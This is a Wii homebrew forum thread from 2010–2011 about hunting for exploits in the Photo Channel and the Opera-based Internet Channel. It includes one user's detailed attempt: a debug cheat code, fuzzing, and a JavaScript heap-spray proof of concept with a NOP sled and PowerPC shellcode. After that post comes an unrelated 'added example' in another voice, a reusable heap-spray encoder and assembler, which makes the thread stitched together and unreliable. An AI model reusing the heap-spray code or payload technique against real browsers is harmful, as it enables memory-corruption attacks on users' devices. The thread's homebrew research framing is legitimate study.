Idea for new Wii exploits?

Posted by XICO2KX 
December 03, 2010 01:04PM
Hello! :)
I was reading something about the Photo Channel on Wikipedia, and it says that it can read the following formats:
JPEG, JPG, MOV, AVI, MP3, AAC, M4A
And it also mentions that the current version v1.1 was last updated on December 10, 2007...
So, in theory, all the vulnerabilities discovered for those file formats since then should still be unfixed! :O
Here's just a few examples: :P
* WAV
* MJPEG
* M4A
* AAC
I know that all these exploits are platform/implementation dependent... :/
But who knows, maybe the programmers at Nintendo made similar mistakes! :)
Has anyone tried testing something like this yet? ^_^
Re: Idea for new Wii exploits?
December 03, 2010 05:34PM
The ease of finding exploits depends on whether or not Nintendo were lazy and used open libraries, or wrote proprietary ones. If the latter, it's much harder to find exploits AFAIK.

Also, I believe in v1.1, they removed the music playing, so no MP3, AAC or M4A (I thought AAC and M4A were the same anyway? Maybe I got confused...)
Re: Idea for new Wii exploits?
December 06, 2010 02:59AM
Quote
SifJar
(...) I thought AAC and M4A were the same anyway? Maybe I got confused... (...)
You're right! They're just different file extensions for the same file format! :P

Anyway, I wonder if the Bannerbomb exploit was based on a Heap Overflow similar to this one! ;)
Re: Idea for new Wii exploits?
December 07, 2010 03:52PM
Quote
SifJar
Also, I believe in v1.1, they removed the music playing, so no MP3, AAC or M4A
Btw, Photo Channel v1.1 still supports AAC/M4A files, like mentioned here! ;)
Re: Idea for new Wii exploits?
December 07, 2010 07:18PM
Yeah I don't think you can just 'make' an exploit just because it loads files from an SD card.
Re: Idea for new Wii exploits?
December 08, 2010 12:01PM
Bannerbomb is most likely based on a stack overflow, which are the easiest to exploit.

If you can get the photo channel to crash with intentionally corrupted files, then you might be on to something. But I don't think you will. The 'normal' file formats are well known and there are good libraries available for them, which are exploit free.



Edited 1 time(s). Last edit at 12/08/2010 12:02PM by Daid.
Re: Idea for new Wii exploits?
February 08, 2011 07:43PM
I know I should probably do some more of my own research before asking, but what the heck. Has anyone tried any web-based exploits on the wii?

[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?

I'm going to start picking apart opera and seeing if any exploits might apply to the Wii. Feedback(especially "it's already been tried") is greatly appreciated
Re: Idea for new Wii exploits?
February 09, 2011 06:20PM
Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?
That php exec func is _only_ for executing software on the web server, not the client.
Re: Idea for new Wii exploits?
February 09, 2011 09:13PM
Maybe if someone would release the source to Smash Stack, or its JAP clone, maybe that would help us PAL Wii owners.
Re: Idea for new Wii exploits?
February 09, 2011 09:32PM
It's being ported to PAL (by several different people/groups of people I think), be patient ;)
Re: Idea for new Wii exploits?
February 09, 2011 09:40PM
Fine fine. I'll stop hijacking this thread. But how can it be being ported without the source? Is Comex's USA version or Y.S's JAP version open source?
Re: Idea for new Wii exploits?
February 09, 2011 11:38PM
It's probably being cloned. Although I'd also say ported because the same stack overflow is being used.
Re: Idea for new Wii exploits?
February 10, 2011 04:03AM
Quote
yellowstar
Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?
That php exec func is _only_ for executing software on the web server, not the client.

I see. I know that Opera has some decent exploits. Most of the stuff I have read is mainly for Opera 11. I've done some more reading on Opera 9 for wii and it doesn't even look like it supports php scripts anyway

[www.opera.com]

But it does have XML support

[securitytracker.com] -this one is to exploit a .dll file, but I'm still looking around at some other sites as well.
I know that packetstorm has some opera exploits in their database...

[packetstormsecurity.org]

If I am able to compromise the wii through opera and the internet channel, would I have access to the wii's nand?

Also back to the original subject and PhotoChannel. Has anyone come up with a steganography program that can launch embedded code?
Re: Idea for new Wii exploits?
February 10, 2011 07:01PM
Quote
metroid_maniac
Fine fine. I'll stop hijacking this thread. But how can it be being ported without the source? Is Comex's USA version or Y.S's JAP version open source?

Same way the JAP version was done without source: reverse engineering.
Re: Idea for new Wii exploits?
February 10, 2011 07:22PM
Quote
otto
Quote
yellowstar
Quote
otto
[php.bigresource.com]
"Execute Exe File From Php Code Through Browser"

Maybe host a .dol file on a webserver somewhere?
That php exec func is _only_ for executing software on the web server, not the client.

I see. I know that Opera has some decent exploits. Most of the stuff I have read is mainly for Opera 11. I've done some more reading on Opera 9 for wii and it doesn't even look like it supports php scripts anyway

[www.opera.com]

But it does have XML support

[securitytracker.com] -this one is to exploit a .dll file, but I'm still looking around at some other sites as well.
I know that packetstorm has some opera exploits in their database...

[packetstormsecurity.org]

If I am able to compromise the wii through opera and the internet channel, would I have access to the wii's nand?

Also back to the original subject and PhotoChannel. Has anyone come up with a steganography program that can launch embedded code?

Of course opera "supports" php, anything that can use HTTP "supports" it, php is server-side only, the client doesn't need anything really to "support" it.
Re: Idea for new Wii exploits?
February 10, 2011 08:34PM
Hey otto! :)
That's a pretty good idea! :D
Here's some info that might help! ;)

According to the description of the Internet Channel, the Wii is running Opera v9.30, so any vulnerabilities found for that version and above should probably work! ;)
Also, it supports Flash too! So, another source of exploits to try! ;)

At the official Opera website, they maintain an updated list of every security vulnerability found in the browser! :D
Not very technically detailed, though! :P

The Exploit Database website also has a pretty good list of Opera exploits for you to try! ;)

Also, here's some random interesting recent exploits: ;)
* Opera 11 Integer Truncation Vulnerability
* Opera Buffer Overflow and Information Disclosure
* Opera 10.01 Remote Array Overrun (Arbitrary code execution)

Good luck!!! :D
And keep us updated of your progress! ;)
Re: Idea for new Wii exploits?
February 24, 2011 11:50PM
hey,

I've spent some days playing around with the Internet Channel. I found this thread and I think it's appropriate to share my experience here :) The bad news first: I didn't find any really useful exploit. If you aren't interested in technical details you can stop reading here. Also note that I'm not a native speaker, so excuse my bad wording :)

Basically, there are several points to attack:
(1) basic html/xml/javascript parser vulnerabilities
(2) jpg/png/etc. attacks
(3) flash

But before starting with concrete attacks, you usually do some kind of static analysis. For this, you of course need the main executable of the Internet Channel.
"Easy", I thought: look up the WiiBrew title database, start wiifuse_server and copy the file over. As usual, there are several files (27.app - 2f.app, at least for the latest version 4.3) and you have to identify the executable. My method is to look for the string "Metrowerks Target Resident Kernel for PowerPC"; if the file contains that string, it is an executable generated with the Nintendo SDK (at least, this is my theory).

So, if you get a DOL, you do for example this:
$ strings -t x batman.dol | grep 'Metrowerks Target'
    287  Metrowerks Target Resident Kernel for PowerPC

However, this wasn't the case for any file of the Internet Channel.
After some searching, I found this:
$ xxd 00000028.app | grep 'arget Re' -A 3 -B 1
0000390: a638 1021 0010 33bf 4d65 7472 006f 7765  .8.!..3.Metr.owe
00003a0: 726b 7320 5400 6172 6765 7420 5265 0073  rks T.arget Re.s
00003b0: 6964 656e 7420 4b00 6572 6e65 6c20 666f  ident K.ernel fo
00003c0: 1372 2050 3022 5043 00b4 2c0a 601b 0c48  .r P0"PC..,.`..H
00003d0: 092f 3c0c 20d6 0181 a97c 5100 43a6 7c5a  ./<. ....|Q.C.|Z

Which is... well, strange. Look at the hexdump of the string; it contains several null bytes. I have no idea why this is so...
Also, by trying to identify the DOL header, you find some similarities with a valid one, but it's somehow fucked up. Bleh, I gave up at this point.

Another thing you want to have is some kind of debugging. First, (a) there is WiiRd. Second, (b) there is a so-called "fwrite patch", which enables debugging features over USB Gecko and, for this particular case, enables exception logs (see below for some examples).

For (a) you usually take Gecko OS, boot your title and apply some patches (for example (b)). However, while (a) worked (setting breakpoints, viewing the memory content, etc.), (b) didn't. Strange... so I looked a bit in the Gecko OS source and found nothing, except that it does all things as expected, but it just doesn't find a match for the fwrite function. Well, bad.
So I compared the content of the executable loaded by Gecko OS with the app files I have from the NAND, and it matched 0000002f.app. Although this is apparently a valid executable, it's pretty small. Also, it contains no fwrite function. So my guess is that 2f.app is some kind of loader. This is supported by the fact that, by looking at the memory dump of the running Internet Channel, I found the fwrite function. Gotcha!

So, I know there is an fwrite function, but I cannot patch it with Gecko OS; what should I do now? Exactly: write a cheat code :)
Since this is the first cheat code I wrote, it isn't that generic. At least you can use it for the PAL version of the Internet Channel.
[fwrite patch for inetchannel]
* 040869E8 7C8429D6
* 040869EC 39400000
* 040869F0 9421FFF0
* 040869F4 93E1000C
* 040869F8 7F8A2000
* 040869FC 409C0064
* 04086A00 3D00CD00
* 04086A04 3D60CD00
* 04086A08 3D20CD00
* 04086A0C 61086814
* 04086A10 616B6824
* 04086A14 61296820
* 04086A18 398000D0
* 04086A1C 38C00019
* 04086A20 38E00000
* 04086A24 91880000
* 04086A28 7C0350AE
* 04086A2C 5400A016
* 04086A30 6400B000
* 04086A34 900B0000
* 04086A38 90C90000
* 04086A3C 80090000
* 04086A40 701F0001
* 04086A44 4082FFF8
* 04086A48 800B0000
* 04086A4C 90E80000
* 04086A50 540037FE
* 04086A54 7D4A0214
* 04086A58 7F8A2000
* 04086A5C 419CFFC8
* 04086A60 7CA32B78
* 04086A64 83E1000C
* 04086A68 38210010
* 04086A6C 4E800020

Well, let's try to attack it:
(1.1) MangleMe. Cool idea: this is a script which randomly generates HTML output under several conditions. Also, it inserts a refresh directive, forcing the browser to immediately reload the page. Each request generates a new page, and so on. The goal is to crash the browser. If that happens, you can find a unique ID in the httpd log and regenerate the test case.

I played a bit with it, but not that long, because at this point I realized the Wii browser supports Flash (haha).



(2) I tried some PoCs for JPG/PNG vulnerabilities. They didn't work out immediately, so I basically skipped that part.


(3) Flash. Great. I never wanted to touch that piece of software in my life, except for YouTube :-)
But never say never, here we go: as you probably know, there are several Flash versions out there. Flash runs in a virtual machine which supports several instructions on a bytecode level (similar to the Java VM, etc.). We want to work on that level, so I grabbed the AVM2 Overview and took a disassembler (swfdump, but there are more for Windows AFAIK).
Also, you find many properly worked-out reports of Flash flaws; for example, that one is just awesome: Leveraging the ActionScript Virtual Machine (probably a cylon like segher).

Now it was time to get my hands dirty, so I tried some PoCs and real-life examples on my Wii... but there is a "but": the Internet Channel didn't accept any of them. So I tried to build some awes0me flash m0viez on my own.
- flex (the Adobe Flash compiler) is free; I downloaded the oldest version available on their site. I created one example with it. It outputs Flash 9 compatible files. Works on my PC but not on the Wii.
- haxe. Produces Flash 8 compatible SWF files. Works on my PC but not on the Wii.
- swfc. Produces Flash 6 code, works on both PC and Wii. Success?

Well, actually not. What's the version of the Flash plugin in the Wii? According to [www.adobe.com] it's "9,1,122,0". Google doesn't know much about this version. Wikipedia says it's Flash Player Lite 3.1, which was released in Feb 2009, which is quite old! (The latest Internet Channel was released back in Sep 2009.)

Hrm, so why don't the flex and haxe stuff work? You know, AVM2 was introduced with Flash 9, so there shouldn't be a problem with the Internet Channel, right? But, as you can already guess, wrong :/ Some guy who develops Flash stuff (I don't have the URL anymore) stated he cannot use features above Flash 7. There are some more hints if you Google for it.

So.. damn. Basically that means I cannot use new vulnerabilities found for Flash (at least if they're based on AVM2, but most are). The good thing here is that swfc runs on Linux and it's open source.
I tried some other stuff with it, for example including some malformed JPEGs in the SWF file. This wasn't that easy, since swfc tries to verify the JPEG with libjpeg and transform it (for whatever reason) before embedding it in the SWF file. So I wrote a little patch for swfc (yay, open source) to avoid this. Although I got that working, I had no success with malformed JPEGs. I gave up on that thing... (If someone is interested in the swfc patch, feel free to contact me, but you're probably able to do it yourself anyway :)).


So this was my Flash experience. I wrote (1.1) before, because there's a (1.2), which was the best result of my Internet Channel journey ->
Using this PoC results in a crash (as stated in the report). However, looking at the exception logs (enabled due to the fwrite thingy), you get this (for some reason, that needs 2-3 minutes to happen):
0003, 0005, 0008, 0009 and many many more. Basically the Wii goes wild now (which is probably a bit risky, but heh).

Well, 0009 is very interesting.
Attempted to fetch instruction from invalid address 0x91150bb8 (read from SRR0)
To make it short, you can control the data in that region. How? Allocating stuff on the heap is quite easy in a browser: just allocate some data in the JavaScript virtual machine and do that several times (aka "heap spraying"). My code for that:

<script>
	var i = 0x3377331; //force the VM to align the data, since there's code after it
	var str = "\u6000\u0000"; //nop
	//place many many NOPs here, since we don't know exactly where it jumps in here.
	for (i = 0; i < 20; i++) {
		str += str;
	}
	//enlighten the DVD-drive LED!
	str += "\u3d20\ucd80"; //lis 9,0xcd80
	str += "\u3900\u0020"; //li  8,0x20
	str += "\u9109\u00c0"; //stw 8,0xc0(9)
	str += "\u4e80\u0020"; //blr
	str += "\u6000"; //proper padding. again alignment stuff

	var arr = new Array(100);
	for (i = 0; i < 100; i++) {
		arr[i] = str; //fill every slot with a copy of the sled + payload
	}
	alert(arr[4]);
</script>
<body>
	<iframe src="evil_xml_exploit.xml"></iframe>
</body>
<!-- well, correct the html tags above on your own. somehow the forum software fuck them up :) -->
On x86 it's a bit easier than here, because a NOP is just "0x90", i.e. just one byte, so you don't have to care about alignment in this case. Fortunately, you can fool the JavaScript VM by allocating a variable of size u32. It's better for the VM to place that on an aligned address, in order to load/store it with one instruction. Therefore, the data after it is also (properly) aligned.

Anyway, if the stuff works, the LED should go on.
Well, BUT, two things why it doesn't work/isn't good anyway:
- It doesn't work because MEM2 (the 0x9000000 region; check WiiBrew for it) is configured as guarded memory (at least the Internet Channel does so), meaning that the CPU can't fetch instructions from that memory region. You would have to execute some instructions before to disable that (reconfigure the BATs; thanks to segher for pointing this out to me). You can determine that by studying the content of SRR1 more closely.
- This attack isn't reliable. It does what I want (jumping into the heap spray stuff) only every 5th time on average. Compare the exception logs. This wouldn't be good enough for a public exploit IMHO.


So, if you got that far, thanks for reading, and hopefully it's useful for somebody out there.
For my part I've given up the whole Opera thing, primarily because I don't have the binary for static analysis. I'd probably try more stuff if someone can figure out what's wrong there. But anyway, keep in mind that Nintendo could easily fix that kind of exploit, so consider whether you really want to invest time in it.


cheers,
lewurm
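The PowerPC stub in lewurm's spray was hand-assembled. The following is an added example (my code, not lewurm's and not from the original post) that encodes the same four instructions from their opcode and register fields, packs them into UTF-16 code units the way the post's "\uXXXX" literals do, and decodes the result back to check it. It assumes a 32-bit big-endian PowerPC target and a JavaScript engine that stores the string as 2-byte code units; the 0xcd8000c0 LED address is copied from the post and not verified here.

```javascript
// Added example: assemble the PowerPC payload of a UTF-16 heap spray and verify it.
// Assumptions: 32-bit big-endian PowerPC; JS strings stored as 2-byte UTF-16 code
// units, so one instruction word is exactly two \uXXXX units (high half first).

// D-form encoder: opcode(6) | rT/rS(5) | rA(5) | 16-bit immediate or displacement.
function dform(opcode, rt, ra, imm) {
  return ((opcode << 26) | (rt << 21) | (ra << 16) | (imm & 0xffff)) >>> 0;
}

const PPC = {
  nop: () => 0x60000000,                          // ori r0,r0,0
  lis: (rt, imm) => dform(15, rt, 0, imm),        // addis rt,r0,imm
  li:  (rt, imm) => dform(14, rt, 0, imm),        // addi  rt,r0,imm
  stw: (rs, disp, ra) => dform(36, rs, ra, disp), // stw   rs,disp(ra)
  lwz: (rt, disp, ra) => dform(32, rt, ra, disp), // lwz   rt,disp(ra)
  blr: () => 0x4e800020,
};

// One 32-bit big-endian word -> two UTF-16 code units, matching "\u3d20\ucd80" style.
function wordToUnits(word) {
  return String.fromCharCode((word >>> 16) & 0xffff, word & 0xffff);
}

// Build the spray string: a sled of NOP words followed by the payload words.
function buildSpray(nopCount, payloadWords) {
  let s = '';
  for (let i = 0; i < nopCount; i++) s += wordToUnits(PPC.nop());
  for (const w of payloadWords) s += wordToUnits(w);
  return s;
}

// Decode a spray string back into words. An odd code-unit count means every
// instruction after the odd unit is shifted by two bytes, so refuse it.
function unitsToWords(s) {
  if (s.length % 2 !== 0) {
    throw new Error('odd number of code units: instruction words would be misaligned');
  }
  const words = [];
  for (let i = 0; i < s.length; i += 2) {
    words.push(((s.charCodeAt(i) << 16) | s.charCodeAt(i + 1)) >>> 0);
  }
  return words;
}

// Minimal disassembler for just the forms used here, to spot-check the result.
function disasm(word) {
  const op = word >>> 26;
  const rt = (word >>> 21) & 31;
  const ra = (word >>> 16) & 31;
  const imm = word & 0xffff;
  const hex = (v) => '0x' + v.toString(16);
  if (word === 0x4e800020) return 'blr';
  if (op === 24 && rt === 0 && ra === 0 && imm === 0) return 'nop';
  if (op === 15 && ra === 0) return `lis r${rt},${hex(imm)}`;
  if (op === 14 && ra === 0) return `li r${rt},${hex(imm)}`;
  if (op === 36) return `stw r${rt},${hex(imm)}(r${ra})`;
  if (op === 32) return `lwz r${rt},${hex(imm)}(r${ra})`;
  return '.long 0x' + word.toString(16).padStart(8, '0');
}

// The post's payload: store 0x20 to 0xcd8000c0 (address taken from the post,
// described there as lighting the DVD drive LED; not verified here), then return.
const LED_STUB = [
  PPC.lis(9, 0xcd80),
  PPC.li(8, 0x20),
  PPC.stw(8, 0xc0, 9),
  PPC.blr(),
];

// Same sled size as the post's doubling loop: one NOP doubled 20 times = 2^20 NOPs.
function sprayString() {
  return buildSpray(1 << 20, LED_STUB);
}
```

Running `unitsToWords(sprayString()).map(disasm)` gives only `nop` followed by the four payload instructions, and the encoded words match the constants lewurm wrote by hand. Whether the engine places the string on a 4-byte boundary is the separate alignment question the post raises; the odd-length check here only catches a payload that breaks word alignment by its own length.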
Re: Idea for new Wii exploits?
February 25, 2011 12:21AM
Thanks for the technical writeup lewurm, it's nice to see such an in-depth post. It's true that even if a reliable exploit was found in the Internet Channel I'm sure Nintendo would just pull what they did with Sudoku on the DSi Shop.
Re: Idea for new Wii exploits?
February 25, 2011 10:12AM
But many people have the Internet Channel installed already, making it quite a nice attack vector. The issue I see with releasing a page-based exploit is that people could also use it for bad things. Go to URL X to brick your Wii.

I looked through the list of Opera exploits above, and only a few are remote code execution, and none of them seem to crash the Wii. I figured if I can find some way to crash the Wii I can take it from there. But they seem to depend on allocation of large amounts of memory, which the Wii doesn't have.

The Opera 'engine' is pretty secure, I would assume. Maybe it's more likely that you'll find an exploit in code custom for the Wii. Through the bookmark system for example? The Internet Channel save data seems to be protected from copying to SD, but does that also mean that if you have a copy of it on your SD card (by means of Banana Saves for example) you cannot copy it back? Else you might be able to build a custom Internet Channel save with a too-long bookmarked URL that exploits the channel.
Re: Idea for new Wii exploits?
February 26, 2011 06:02AM
I must say that lewurm has put more time and effort into this than I would be able to in a month. First I guess I should say that I don't have much of a programmer/hacker background, I do know how to pick apart small pieces of code and sometimes if I'm lucky make them do what I want. I'm also a construction worker and I have a small child so I don't have a lot of time to devote to this either.

Daid you bring up a few good points. First, a malicious URL that would brick your wii would definitely be bad. Second, if I were able to exploit the internet channel to run code how do I run the code? It's kind of a catch 22. I would like to be able to softmod a wii by going to a specific url, but if I crash the internet channel how would I have access to the needed files? Would it be possible to edit the code for smash stack and maybe launch via "file://" link or something similar in internet channel?